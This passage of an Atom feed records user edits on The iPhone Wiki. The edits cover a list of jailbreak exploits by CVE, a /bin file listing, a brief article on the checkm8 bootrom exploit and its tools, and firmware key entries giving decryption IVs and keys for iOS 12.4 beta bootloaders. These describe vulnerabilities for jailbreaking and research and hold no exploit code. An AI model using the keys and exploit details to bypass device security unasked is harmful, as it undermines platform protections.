* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* tachy0n (originally dubbed &amp;quot;lightspeed&amp;quot;) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=User:Inflatable_Man&amp;diff=102974</id>
		<title>User:Inflatable Man</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=User:Inflatable_Man&amp;diff=102974"/>
		<updated>2020-05-28T22:23:57Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: User page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;There is currently text in this page.&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/bin&amp;diff=102959</id>
		<title>/bin</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/bin&amp;diff=102959"/>
		<updated>2020-05-27T19:18:43Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Files */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Folder that contains GNU Coreutils. The GNU Core Utilities are the basic file, shell and text manipulation utilities of the GNU operating system. These are the core utilities which are expected to exist on every operating system. Most of the files here are installed with a jailbreak except for df and ps.&lt;br /&gt;
&lt;br /&gt;
== Children ==&lt;br /&gt;
=== Folders ===&lt;br /&gt;
&lt;br /&gt;
There are no folders that exist inside of /bin.&lt;br /&gt;
&lt;br /&gt;
=== Files ===&lt;br /&gt;
&lt;br /&gt;
* bash&lt;br /&gt;
* bunzip2&lt;br /&gt;
* bzcat&lt;br /&gt;
* bzip2&lt;br /&gt;
* bzip2recover&lt;br /&gt;
* cat&lt;br /&gt;
* chgrp&lt;br /&gt;
* chmod&lt;br /&gt;
* chown&lt;br /&gt;
* cp&lt;br /&gt;
* date&lt;br /&gt;
* dd&lt;br /&gt;
* df (present in jailed iOS)&lt;br /&gt;
* dir&lt;br /&gt;
* echo&lt;br /&gt;
* egrep&lt;br /&gt;
* false&lt;br /&gt;
* fgrep&lt;br /&gt;
* grep&lt;br /&gt;
* gunzip&lt;br /&gt;
* gzexe&lt;br /&gt;
* gzip&lt;br /&gt;
* kill&lt;br /&gt;
* [[launchctl]]&lt;br /&gt;
* ln&lt;br /&gt;
* ls&lt;br /&gt;
* mkdir&lt;br /&gt;
* mknod&lt;br /&gt;
* mktemp&lt;br /&gt;
* mv&lt;br /&gt;
* ps (present in jailed iOS)&lt;br /&gt;
* pwd&lt;br /&gt;
* [[readlink]]&lt;br /&gt;
* rm&lt;br /&gt;
* rmdir&lt;br /&gt;
* se&lt;br /&gt;
* sh&lt;br /&gt;
* sleep&lt;br /&gt;
* stty&lt;br /&gt;
* [[su]]&lt;br /&gt;
* sync&lt;br /&gt;
* tar&lt;br /&gt;
* touch&lt;br /&gt;
* true&lt;br /&gt;
* uname&lt;br /&gt;
* uncompress&lt;br /&gt;
* vdir&lt;br /&gt;
* zcat&lt;br /&gt;
* zcmp&lt;br /&gt;
* zdiff&lt;br /&gt;
* zegrep&lt;br /&gt;
* zfgrep&lt;br /&gt;
* zforce&lt;br /&gt;
* zgrep&lt;br /&gt;
* zless&lt;br /&gt;
* zmore&lt;br /&gt;
* znew&lt;br /&gt;
&lt;br /&gt;
== Parents ==&lt;br /&gt;
{{parent}}&lt;br /&gt;
&lt;br /&gt;
[[Category:Filesystem]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Checkm8_Exploit&amp;diff=102958</id>
		<title>Checkm8 Exploit</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Checkm8_Exploit&amp;diff=102958"/>
		<updated>2020-05-27T18:36:05Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Fixed URL title in the references section.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
The '''checkm8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-8900 used to run unsigned code on iOS, iPadOS, tvOS, watchOS, and bridgeOS devices with processors between an A5 and an A11 or a T2 (and thereby [[jailbreak]] it). Jailbreaks based on checkm8 are [[semi-tethered jailbreak]]s as the exploit works by taking advantage of a heap overflow in the USB DFU stack.&lt;br /&gt;
&lt;br /&gt;
[[ipwndfu]] and [[checkra1n]] are currently the main tools capable of using the checkm8 exploit. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* [https://habr.com/en/company/dsec/blog/472762/ Technical analysis of the checkm8 exploit]&lt;br /&gt;
* [https://www.kb.cert.org/vuls/id/941987/ Apple devices vulnerable to arbitrary code execution in SecureROM]&lt;br /&gt;
* [https://news.ycombinator.com/item?id=22849837 https://news.ycombinator.com/item?id=22849837]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Exploits]]&lt;br /&gt;
[[Category:Bootrom Exploits]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Checkm8_Exploit&amp;diff=102957</id>
		<title>Checkm8 Exploit</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Checkm8_Exploit&amp;diff=102957"/>
		<updated>2020-05-27T18:35:15Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Replaced &amp;quot;Touch Bar&amp;quot; with &amp;quot;bridgeOS&amp;quot; and added a reference for it.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
The '''checkm8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-8900 used to run unsigned code on iOS, iPadOS, tvOS, watchOS, and bridgeOS devices with processors between an A5 and an A11 or a T2 (and thereby [[jailbreak]] it). Jailbreaks based on checkm8 are [[semi-tethered jailbreak]]s as the exploit works by taking advantage of a heap overflow in the USB DFU stack.&lt;br /&gt;
&lt;br /&gt;
[[ipwndfu]] and [[checkra1n]] are currently the main tools capable of using the checkm8 exploit. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* [https://habr.com/en/company/dsec/blog/472762/ Technical analysis of the checkm8 exploit]&lt;br /&gt;
* [https://www.kb.cert.org/vuls/id/941987/ Apple devices vulnerable to arbitrary code execution in SecureROM]&lt;br /&gt;
* [https://news.ycombinator.com/item?id=22849837]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Exploits]]&lt;br /&gt;
[[Category:Bootrom Exploits]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=PeaceGSeed_16G5027i_(iPad6,11)&amp;diff=102950</id>
		<title>PeaceGSeed 16G5027i (iPad6,11)</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=PeaceGSeed_16G5027i_(iPad6,11)&amp;diff=102950"/>
		<updated>2020-05-27T16:48:45Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Corrected typo for &amp;quot;beta&amp;quot; mispelled as &amp;quot;b eta&amp;quot;.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{keys&lt;br /&gt;
 | Version               = 12.4 beta 2&lt;br /&gt;
 | Build                 = 16G5027i&lt;br /&gt;
 | Device                = iPad6,11&lt;br /&gt;
 | Codename              = PeaceGSeed&lt;br /&gt;
 | DownloadURL           = https://updates.cdn-apple.com/2019SpringSeed/fullrestores/041-66048/ED16905A-78AD-11E9-8C63-A1A6CED02F5C/iPad_64bit_TouchID_ASTC_12.4_16G5027i_Restore.ipsw&lt;br /&gt;
&lt;br /&gt;
 | Model                 = J71sAP&lt;br /&gt;
 | Model2                = J71tAP&lt;br /&gt;
&lt;br /&gt;
 | RootFS                = 048-80921-012&lt;br /&gt;
 | RootFSKey             = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | UpdateRamdisk         = 048-81265-012&lt;br /&gt;
 | UpdateRamdiskIV       = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | RestoreRamdisk        = 048-80913-012&lt;br /&gt;
 | RestoreRamdiskIV      = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | AOPFirmware           = aopfw-ipad6faop.im4p&lt;br /&gt;
 | AOPFirmwareIV         = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | AppleLogo             = applelogo@2x~ipad.im4p&lt;br /&gt;
 | AppleLogoIV           = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | BatteryCharging0      = batterycharging0@2x~ipad.im4p&lt;br /&gt;
 | BatteryCharging0IV    = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | BatteryCharging1      = batterycharging1@2x~ipad.im4p&lt;br /&gt;
 | BatteryCharging1IV    = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | BatteryFull           = batteryfull@2x~ipad.im4p&lt;br /&gt;
 | BatteryFullIV         = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | BatteryLow0           = batterylow0@2x~ipad.im4p&lt;br /&gt;
 | BatteryLow0IV         = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | BatteryLow1           = batterylow1@2x~ipad.im4p&lt;br /&gt;
 | BatteryLow1IV         = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | DeviceTree            = DeviceTree.j71sap.im4p&lt;br /&gt;
 | DeviceTreeIV          = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | DeviceTree2           = DeviceTree.j71tap.im4p&lt;br /&gt;
 | DeviceTree2IV         = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | GlyphPlugin           = glyphplugin@2x~ipad-lightning.im4p&lt;br /&gt;
 | GlyphPluginIV         = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | iBEC                  = iBEC.ipad6f.RELEASE.im4p&lt;br /&gt;
 | iBECIV                = 6b598a23bcc4b8449a6328fcb6c4bb08&lt;br /&gt;
 | iBECKey               = 1618a1e4bdcd9e8d5dbe777f0bb962844b8a015f21b229c1e2f85ec37f0c664a&lt;br /&gt;
&lt;br /&gt;
 | iBEC2                 = iBEC.j71t.RELEASE.im4p&lt;br /&gt;
 | iBEC2IV               = Unknown&lt;br /&gt;
 | iBEC2Key              = Unknown&lt;br /&gt;
 | iBEC2KBAG             = f82cd5904db534abd6f218c9d6ca327aa744895d65ba46d00b0def1fbda1d836c21fadf3ade6bd603935ea4c6529365b&lt;br /&gt;
&lt;br /&gt;
 | iBoot                 = iBoot.ipad6f.RELEASE.im4p&lt;br /&gt;
 | iBootIV               = bff6412e78a030b1d2ff03350db620e8&lt;br /&gt;
 | iBootKey              = 146b42decb9850ba20e663c55528b349f57dc64314dcd3d7e40ddef94667e0cb&lt;br /&gt;
&lt;br /&gt;
 | iBoot2                = iBoot.j71t.RELEASE.im4p&lt;br /&gt;
 | iBoot2IV              = Unknown&lt;br /&gt;
 | iBoot2Key             = Unknown&lt;br /&gt;
 | iBoot2KBAG            = 66805c9e1d8a9c35528e67cc74d5ccc90ff03a87cf71cc6c2ac700f809dee7710d59fce17148b21436216c73535e2b84&lt;br /&gt;
&lt;br /&gt;
 | iBSS                  = iBSS.ipad6f.RELEASE.im4p&lt;br /&gt;
 | iBSSIV                = e74fd06e51914ba023cdb775b90133a5&lt;br /&gt;
 | iBSSKey               = be5d767c69559c47a342a2199dbeac5cc472bc25a8bf40a7f666032f731980f0&lt;br /&gt;
&lt;br /&gt;
 | iBSS2                 = iBSS.j71t.RELEASE.im4p&lt;br /&gt;
 | iBSS2IV               = Unknown&lt;br /&gt;
 | iBSS2Key              = Unknown&lt;br /&gt;
 | iBSS2KBAG             = 76070961d028d915b5c25a9d2fd91c61e1a6836dae34bee1f2367b439f269d578af0e3dfcbbdf39bc6cd1477afe4f7b1&lt;br /&gt;
&lt;br /&gt;
 | Kernelcache           = kernelcache.release.ipad6f&lt;br /&gt;
 | KernelcacheIV         = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | LLB                   = LLB.ipad6f.RELEASE.im4p&lt;br /&gt;
 | LLBIV                 = e930cf44dd53dcaa51fbeadc559d18e6&lt;br /&gt;
 | LLBKey                = 8fb6b100a7978975eced0de9e0c053bb1f024248d357b025b94aff4db2aed639&lt;br /&gt;
&lt;br /&gt;
 | LLB2                  = LLB.j71t.RELEASE.im4p&lt;br /&gt;
 | LLB2IV                = Unknown&lt;br /&gt;
 | LLB2Key               = Unknown&lt;br /&gt;
 | LLB2KBAG              = 47c913abdc63f8759fe3da0076b7b0379b8feb5b78cc03975abb5d4bdd78f58f81fa942526aa3db723086efd80deeb36&lt;br /&gt;
&lt;br /&gt;
 | RecoveryMode          = recoverymode@2x~ipad-lightning.im4p&lt;br /&gt;
 | RecoveryModeIV        = Not Encrypted&lt;br /&gt;
&lt;br /&gt;
 | SEPFirmware           = sep-firmware.j71s.RELEASE.im4p&lt;br /&gt;
 | SEPFirmwareIV         = Unknown&lt;br /&gt;
 | SEPFirmwareKey        = Unknown&lt;br /&gt;
 | SEPFirmwareKBAG       = a5032e4b514115acefbe585bcd75e59fddc9a19b8b1ef61318fd21883c9eee52360b2fbb7585d7ec866f50bd1feab4b5&lt;br /&gt;
&lt;br /&gt;
 | SEPFirmware2          = sep-firmware.j71t.RELEASE.im4p&lt;br /&gt;
 | SEPFirmware2IV        = Unknown&lt;br /&gt;
 | SEPFirmware2Key       = Unknown&lt;br /&gt;
 | SEPFirmware2KBAG      = f05ed7eb9a99ebeb05c57e25cc686760a1a6eeeab00c515dc4c1e35088a4c2812e07a459ae5b5a46c94d003b7fa69a50&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
</feed>